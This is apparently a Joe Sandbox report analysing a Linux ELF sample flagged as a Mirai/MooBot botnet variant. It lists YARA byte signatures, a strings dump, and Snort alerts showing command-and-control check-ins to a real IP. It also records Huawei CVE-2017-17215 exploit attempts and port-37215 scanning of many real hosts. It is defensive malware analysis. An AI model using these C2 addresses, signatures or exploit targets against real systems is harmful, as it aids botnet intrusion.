Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
skyljne.x86.elf

Overview

General Information

Sample name:skyljne.x86.elf
Analysis ID:1374445
MD5:2357668b7c737cf603987f04c89b61b2
SHA1:53cba284d060b97b7db31be433d238fd715f72a3
SHA256:b0afcbfd840a393d2e7f4d630986ebc74cdce549aac0cca687e35296cec62ee3
Infos:

Detection

Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Detected Mirai
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Machine Learning detection for sample
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes the "rm" command used to delete files or directories
Found strings indicative of a multi-platform dropper
HTTP GET or POST without a user agent
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Yara signature match

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.
Joe Sandbox version:38.0.0 Ammolite
Analysis ID:1374445
Start date and time:2024-01-14 15:49:01 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 45s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:skyljne.x86.elf
Detection:MAL
Classification:mal100.troj.linELF@0/0@20/0
  • Report size exceeded maximum capacity and may have missing network information.
Command:/tmp/skyljne.x86.elf
PID:6254
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
done.
Standard Error:
  • system is lnxubuntu20
  • sh (PID: 6261, Parent: 1477, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-print-notifications
  • gsd-print-notifications (PID: 6261, Parent: 1477, MD5: 71539698aa691718cee775d6b9450ae2) Arguments: /usr/libexec/gsd-print-notifications
  • dash New Fork (PID: 6264, Parent: 4331)
  • rm (PID: 6264, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.o0m9XlNOsh /tmp/tmp.FgKBN6xDj9 /tmp/tmp.8wfxIBdWbg
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
skyljne.x86.elfJoeSecurity_Mirai_3Yara detected MiraiJoe Security
    skyljne.x86.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      skyljne.x86.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
      • 0x12658:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1266c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12680:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12694:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x126a8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x126bc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x126d0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x126e4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x126f8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1270c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12720:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12734:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12748:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1275c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12770:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12784:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12798:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x127ac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x127c0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x127d4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x127e8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      skyljne.x86.elfLinux_Trojan_Mirai_b14f4c5dunknownunknown
      • 0x40f0:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
      skyljne.x86.elfLinux_Trojan_Mirai_5f7b67b8unknownunknown
      • 0xb525:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
      Click to see the 4 entries
      SourceRuleDescriptionAuthorStrings
      6254.1.0000000008048000.000000000805d000.r-x.sdmpJoeSecurity_Mirai_3Yara detected MiraiJoe Security
        6254.1.0000000008048000.000000000805d000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          6254.1.0000000008048000.000000000805d000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
          • 0x12658:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1266c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x12680:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x12694:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x126a8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x126bc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x126d0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x126e4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x126f8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1270c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x12720:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x12734:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x12748:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1275c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x12770:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x12784:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x12798:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x127ac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x127c0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x127d4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x127e8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          6254.1.0000000008048000.000000000805d000.r-x.sdmpLinux_Trojan_Mirai_b14f4c5dunknownunknown
          • 0x40f0:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
          6254.1.0000000008048000.000000000805d000.r-x.sdmpLinux_Trojan_Mirai_5f7b67b8unknownunknown
          • 0xb525:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
          Click to see the 6 entries
          Timestamp:192.168.2.23103.245.236.15248478199902030490 01/14/24-15:51:05.653747
          SID:2030490
          Source Port:48478
          Destination Port:19990
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.23103.245.236.15252016199902030490 01/14/24-15:50:42.116272
          SID:2030490
          Source Port:52016
          Destination Port:19990
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.23103.245.236.15249894199902030490 01/14/24-15:50:40.277081
          SID:2030490
          Source Port:49894
          Destination Port:19990
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.23179.127.33.12858822372152829579 01/14/24-15:50:56.531542
          SID:2829579
          Source Port:58822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.23103.245.236.15240490199902030490 01/14/24-15:50:32.420512
          SID:2030490
          Source Port:40490
          Destination Port:19990
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.23203.76.233.10457142372152829579 01/14/24-15:50:56.696671
          SID:2829579
          Source Port:57142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.23103.245.236.15233008199902030490 01/14/24-15:50:21.589046
          SID:2030490
          Source Port:33008
          Destination Port:19990
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.23103.245.236.15257376199902030490 01/14/24-15:50:46.942450
          SID:2030490
          Source Port:57376
          Destination Port:19990
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.23179.127.33.12858822372152835222 01/14/24-15:50:56.531542
          SID:2835222
          Source Port:58822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.23103.245.236.15259502199902030490 01/14/24-15:50:49.792424
          SID:2030490
          Source Port:59502
          Destination Port:19990
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.23203.76.233.10457142372152835222 01/14/24-15:50:56.696671
          SID:2835222
          Source Port:57142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.23103.245.236.15238956199902030490 01/14/24-15:50:56.656236
          SID:2030490
          Source Port:38956
          Destination Port:19990
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: skyljne.x86.elfAvira: detected
          Source: skyljne.x86.elfReversingLabs: Detection: 65%
          Source: skyljne.x86.elfVirustotal: Detection: 50%Perma Link
          Source: skyljne.x86.elfJoe Sandbox ML: detected
          Source: skyljne.x86.elfString: Content-Length: /proc/proc/%d/cmdline/proc//proc/%s/exe/proc/self/exevar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellmnt/sys/boot/media/srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearencodersystem/root/dvr_gui//root/dvr_app//var/tmp//anko-app//opt/wgetcurlechocatnanoanko-app/ankosample _8182T_1104/usr/libexec/openssh/sftp-serverQ

          Networking

          barindex
          Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:33008 -> 103.245.236.152:19990
          Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:40490 -> 103.245.236.152:19990
          Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:49894 -> 103.245.236.152:19990
          Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:52016 -> 103.245.236.152:19990
          Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:57376 -> 103.245.236.152:19990
          Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:59502 -> 103.245.236.152:19990
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:58822 -> 179.127.33.128:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:58822 -> 179.127.33.128:37215
          Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:38956 -> 103.245.236.152:19990
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:57142 -> 203.76.233.104:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:57142 -> 203.76.233.104:37215
          Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:48478 -> 103.245.236.152:19990
          Source: global trafficTCP traffic: 197.129.122.226 ports 1,2,3,5,7,37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58822 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57142 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 58822
          Source: unknownNetwork traffic detected: HTTP traffic on port 57142 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57142 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57142 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57142 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34498 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 34498
          Source: unknownNetwork traffic detected: HTTP traffic on port 57142 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49234 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57142 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57142 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37318 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37318 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56142 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58348 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58348 -> 37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.135.207.230:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.197.124.122:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.239.216.8:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.99.251.120:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.17.125.101:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.211.95.183:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.52.171.197:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.6.164.231:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 209.176.14.225:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.236.74.75:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.181.201.191:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 78.234.1.210:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.44.226.132:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.177.132.34:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 138.194.145.156:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.19.248.63:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.221.99.3:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.146.210.114:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.212.74.85:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.216.138.76:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.131.101.71:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 89.37.153.91:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.160.205.174:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 139.227.60.131:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 57.43.208.213:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.72.140.137:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 89.204.212.147:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.204.147.204:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.178.176.207:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.112.50.247:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 220.73.129.110:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.147.55.82:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 103.141.104.225:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 135.250.249.160:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 201.225.254.2:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 124.4.249.248:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.231.250.90:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.38.171.114:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.196.240.29:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.8.65.127:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.186.148.98:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.242.60.233:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.205.233.41:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.74.165.48:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 173.234.224.4:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.80.163.122:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.15.207.167:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.23.9.49:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.153.1.157:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.178.169.40:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 50.95.101.254:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 46.63.249.167:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.91.125.72:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.201.175.75:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.159.170.91:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.88.107.71:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 114.40.162.144:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.208.68.209:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.99.135.82:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.250.231.201:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 125.79.84.99:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.30.138.82:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 92.52.205.247:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 154.63.159.144:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.105.97.213:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.228.4.224:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 132.242.68.168:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.149.3.101:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.41.195.120:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.205.222.75:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 4.221.106.192:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 116.218.11.57:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.157.169.122:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.26.147.87:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.71.106.232:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.85.23.224:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.193.228.245:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.219.153.241:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.198.217.23:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.14.75.224:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 54.2.48.24:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 191.234.68.102:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 124.160.237.219:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 188.133.17.239:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 207.8.172.220:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.85.202.151:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.53.17.168:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.89.184.7:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 5.9.53.69:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.22.17.78:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 132.144.50.162:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 152.237.173.27:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.228.9.91:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.73.143.248:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.58.151.151:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.47.209.245:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.169.220.61:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 18.242.34.212:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.43.114.30:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.151.92.205:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.217.66.211:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.205.150.82:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.245.116.173:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.224.245.227:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.74.17.81:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.194.35.4:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.68.106.194:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.202.179.153:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.202.2.199:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.252.33.128:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 97.104.72.35:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.129.195.19:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.245.145.9:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 71.30.124.15:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.150.202.83:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.125.27.79:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.226.57.189:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.69.48.240:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.242.165.35:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.212.167.140:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.162.63.112:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.78.177.217:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.30.106.12:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.50.65.10:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.0.163.165:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.225.54.177:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 17.203.213.33:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.237.196.13:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 182.34.120.232:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.138.236.228:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.241.123.113:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.54.185.78:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 196.232.184.70:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.11.175.138:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.143.233.237:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.231.223.109:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.144.75.174:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.3.146.115:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.101.193.234:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.82.33.76:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.157.15.20:37215
